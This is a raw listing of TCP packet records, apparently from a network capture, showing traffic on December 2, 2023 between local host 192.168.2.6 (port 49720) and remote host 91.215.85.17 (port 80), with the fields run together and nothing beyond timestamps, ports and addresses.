                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202092886 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202156067 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202159882 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202172995 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202194929 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202207088 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202234030 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202281952 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202342033 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202353001 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202363968 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202373981 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202385902 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202397108 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202408075 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202419043 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202419043 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202447891 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202481985 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202511072 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202522993 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202533960 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202599049 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202605009 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202610970 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202653885 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202665091 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202688932 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202702999 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202735901 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202764988 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202775955 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202785969 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202830076 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202848911 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202945948 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202958107 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202967882 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203021049 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203047037 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203058958 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203095913 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203099966 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203109026 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203150034 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203174114 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203186035 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203229904 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203252077 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203263998 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203303099 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203315020 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203319073 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203357935 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203372955 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203428030 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203435898 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203442097 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203449011 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203454971 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203532934 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203536987 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203548908 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203558922 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203568935 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203609943 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203635931 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203646898 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203668118 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203677893 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203706026 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203727007 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203726053 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203797102 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203808069 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203819036 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203829050 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203835964 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203836918 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203836918 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203872919 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203892946 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203895092 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203915119 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203958988 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.203958988 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.204019070 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.204030991 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.204049110 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.204066038 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.204085112 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.204087973 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.204108953 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.204143047 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.204154015 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.204157114 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.204207897 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.204293966 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.204310894 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.204322100 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.204333067 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.204344988 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.204355001 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.204355955 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.204365969 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.204375029 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.204376936 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.204402924 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.204431057 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.204559088 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.204570055 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.204581976 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.204613924 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.204643011 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.204669952 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.204680920 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.204684019 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.204695940 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.204706907 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.204729080 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.204758883 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.204988956 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205002069 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205044985 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205226898 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205236912 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205255032 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205265999 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205276966 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205281019 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205287933 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205300093 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205302954 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205310106 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205321074 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205329895 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205339909 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205351114 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205363035 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205363035 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205367088 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205378056 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205385923 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205388069 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205399990 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205410004 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205420017 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205430984 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205431938 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205441952 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205452919 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205456972 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205463886 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205475092 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205482006 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205482006 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205486059 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205497026 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205504894 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205507994 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205549955 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205553055 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205554008 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205610037 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205621958 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205636978 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205648899 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205656052 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205681086 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205739021 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205749035 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205760002 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205773115 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205782890 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205790997 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205806971 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205817938 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205835104 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205837011 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205878019 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205883026 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205893993 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205904961 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205924034 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205938101 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.205966949 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206027985 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206038952 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206048965 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206059933 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206075907 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206104040 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206135035 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206192970 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206206083 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206216097 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206240892 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206270933 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206284046 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206295967 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206305981 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206316948 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206327915 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206357002 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206381083 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206389904 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206402063 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206412077 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206439972 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206471920 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206484079 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206485987 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206531048 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206531048 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206545115 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206564903 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206578970 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206587076 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206588984 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206600904 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206624031 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206676960 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206691980 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206703901 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206715107 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206724882 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206758976 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206789017 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206891060 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206984997 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.206995964 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207005978 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207015991 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207027912 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207030058 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207039118 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207048893 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207050085 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207060099 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207077026 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207079887 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207096100 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207101107 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207122087 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207132101 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207159996 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207165956 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207221985 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207233906 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207243919 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207254887 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207266092 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207271099 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207303047 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207307100 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207307100 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207367897 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207412004 CET804972091.215.85.17192.168.2.6
